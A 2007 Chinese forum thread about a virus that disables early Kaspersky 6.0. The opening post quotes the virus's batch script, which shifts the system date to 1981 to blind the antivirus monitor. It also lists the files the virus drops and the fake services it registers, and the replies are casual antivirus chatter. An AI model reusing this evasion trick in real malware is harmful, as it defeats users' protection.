找回密码
 注册

QQ登录

只需一步,快速开始

查看: 488|回复: 4

成功杀掉卡吧6.0 早期版本

[复制链接]
发表于 2007-10-26 18:26:44 | 显示全部楼层 |阅读模式
今天拿到个小病毒..玩了一下下...按某论坛某人的帖得到结果如下9 y7 ?( @4 K" t6 n1 a# K6 A 4 j. ?1 x& V9 D2 w8 I, M 2如果没有安装卡巴斯基,直接运行病毒代码2 F$ P" k5 L- }5 ^ 3如果发现安装卡巴斯基,则先释放一个批处理(.bat)文件,注意卡巴的主动防御并没有吹嘘的那么好,对此代码完全是放纵不管!!代码很简单,如下:0 Y7 z5 N1 [( @0 o% Q   @echo off & X& q5 a; t& H. N5 V& }2 P' i  set date=%date% $ R E/ T5 D) \' B. J% s/ s \  date 1981-1-129 u, g: H8 @+ M$ [: Z% P# Q, i3 i   ping -n 45 localhost > nul4 m, l5 }6 C. r+ D' L   date %date% 7 n3 l* a* N5 S, _$ a7 t# _  del %0 0 D9 V5 C9 t" }: c# \   + L B' J8 ]/ j- l, |8 \8 @4 h# Q# }  会发现系统时间被调整到了1981112(时间没变,日期变了),这时,卡巴斯基的监控立刻失效,在成功完成Over掉卡巴斯基后,病毒释放如下文件3 x+ j; U1 Y; `. g   %SystemRoot%\system32\*.EXE" O5 u+ N6 S- b+ j   %SystemRoot%\system32\*T.EXE, G/ c$ E: f2 x, C" _   %SystemRoot%\system32\*.DLL 0 ~$ G: k* Q: l  %SystemRoot%\system32\delme.bat3 P3 A% J' M5 a( }5 f   (注:*为随机8位字母)* i" m. N" R0 x/ k+ {3 |5 l6 I2 }   并在注册表HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\添加若干伪系统服务,至此,病毒成功运行!可以说,卡巴斯基被秒杀,一点反抗能力也没有。 & x# H! y& Z( G8 \1 J+ b  其实,这个Bug早已存在,但卡巴斯基一直没有修正,直至现在出现了利用这个Bug的病毒6 N+ N3 i0 {6 |) k" R; s ! ?; L, c' t) S0 {8 b. ?7 d
回复

使用道具 举报

发表于 2007-10-26 18:58:52 | 显示全部楼层
嗯,没个完美的杀毒软件
! o. F- ^7 J/ D我总是用完这个试那个。。。重不中毒
回复

使用道具 举报

发表于 2007-10-26 19:07:03 | 显示全部楼层
卡7似乎没有这个问题
回复

使用道具 举报

发表于 2007-10-26 19:16:59 | 显示全部楼层
木马算不算病毒?现在给我感觉木马比病毒还多,还烦。. F8 Y) j4 |0 F% w1 @
好歹老外搞病毒是为了耍酷,国人搞木马纯粹就是为了利益,
回复

使用道具 举报

 楼主| 发表于 2007-10-26 19:28:04 | 显示全部楼层
木马也是病毒的一种啦....反正有伤害的都算computer vires
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 注册

本版积分规则

Archiver|手机版|小黑屋|=|HERO|=战队 ( 皖ICP备19020640号 )|网站地图

GMT+8, 2026-8-25 03:15

Powered by Discuz! X5.0 Licensed

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表